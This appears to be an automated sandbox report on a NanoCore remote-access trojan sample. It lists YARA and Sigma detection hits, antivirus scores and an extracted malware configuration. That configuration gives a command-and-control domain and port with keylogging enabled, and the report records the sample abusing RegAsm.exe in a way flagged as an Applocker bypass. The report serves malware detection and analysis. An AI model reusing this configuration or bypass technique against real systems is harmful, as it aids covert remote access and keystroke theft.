14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x428fd:$a: NanoCore 0x4290d:$a: NanoCore 0x42b41:$a: NanoCore 0x42b55:$a: NanoCore 0x42b95:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x4295c:$b: ClientPlugin 0x42b5e:$b: ClientPlugin 0x42b9e:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42a83:$c: ProjectData 0x10a82:$d: DESCrypto 0x4348a:$d: DESCrypto 0x1844e:$e: KeepAlive
14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.3.RMActivate_isv.exe.bat.3668768.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.3668768.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
13.2.RegAsm.exe.424e424.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28269:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x28296:$x2: IClientNetworkHost
13.2.RegAsm.exe.424e424.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28269:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29344:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x28283:$s5: IClientLoggingHost
13.2.RegAsm.exe.32116dc.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
13.2.RegAsm.exe.32116dc.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
13.2.RegAsm.exe.4252a4d.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c40:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c6d:$x2: IClientNetworkHost
13.2.RegAsm.exe.4252a4d.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c40:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d1b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c5a:$s5: IClientLoggingHost
14.3.RMActivate_isv.exe.bat.3668768.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegAsm.exe.424e424.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.3.RMActivate_isv.exe.bat.3668768.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
13.2.RegAsm.exe.4252a4d.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.wIQLBHYbqz.exe.14a0000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.wIQLBHYbqz.exe.14a0000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.wIQLBHYbqz.exe.14a0000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.wIQLBHYbqz.exe.14a0000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
22.2.RegAsm.exe.30a3c68.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
22.2.RegAsm.exe.30a3c68.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
22.2.RegAsm.exe.40c95ee.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d09f:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0cc:$x2: IClientNetworkHost
22.2.RegAsm.exe.40c95ee.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d09f:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e17a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0b9:$s5: IClientLoggingHost
22.2.RegAsm.exe.40c95ee.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.RegAsm.exe.40c95ee.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d055:$a: NanoCore 0x2d06a:$a: NanoCore 0x2d09f:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce11:$b: ClientPlugin 0x2ce2c:$b: ClientPlugin
0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.3.RMActivate_isv.exe.bat.35d3428.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.35d3428.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
14.3.RMActivate_isv.exe.bat.35d3428.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.35d3428.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42b95:$x1: NanoCore.ClientPluginHost 0x7559d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42bd2:$x2: IClientNetworkHost 0x755da:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46705:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7910d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x428fd:$a: NanoCore 0x4290d:$a: NanoCore 0x42b41:$a: NanoCore 0x42b55:$a: NanoCore 0x42b95:$a: NanoCore 0x75305:$a: NanoCore 0x75315:$a: NanoCore 0x75549:$a: NanoCore 0x7555d:$a: NanoCore 0x7559d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x4295c:$b: ClientPlugin 0x42b5e:$b: ClientPlugin 0x42b9e:$b: ClientPlugin
Click to see the 155 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 4936, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\wIQLBHYbqz.exe' , ParentImage: C:\Users\user\Desktop\wIQLBHYbqz.exe, ParentProcessId: 4904, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 4936

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\wIQLBHYbqz.exe' , ParentImage: C:\Users\user\Desktop\wIQLBHYbqz.exe, ParentProcessId: 4904, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 4936

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "0622add8-a38b-49c1-8dc8-c09cf432", "Group": "NewLappi", "Domain1": "megida.hopto.org", "Domain2": "", "Port": 8822, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for submitted file

Show sources

Source: wIQLBHYbqz.exe	Virustotal: Detection: 69%	Perma Link
Source: wIQLBHYbqz.exe	Metadefender: Detection: 62%	Perma Link
Source: wIQLBHYbqz.exe	ReversingLabs: Detection: 80%

Antivirus / Scanner detection for submitted sample

Show sources

Source: wIQLBHYbqz.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Show sources

Source: megida.hopto.org

Virustotal: Detection: 12%

Perma Link

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat

Avira: detection malicious, Label: HEUR/AGEN.1100005

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.39cb008.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b74629.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40d2a4d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40ce424.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.42495ee.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40ce424.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.3918578.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cb008.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.424e424.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.38c4300.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.424e424.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.4252a4d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40c95ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35d3428.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.611621495.0000000004081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wIQLBHYbqz.exe PID: 4904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RMActivate_isv.exe.bat PID: 6788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7040, type: MEMORYSTR

Source: 22.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
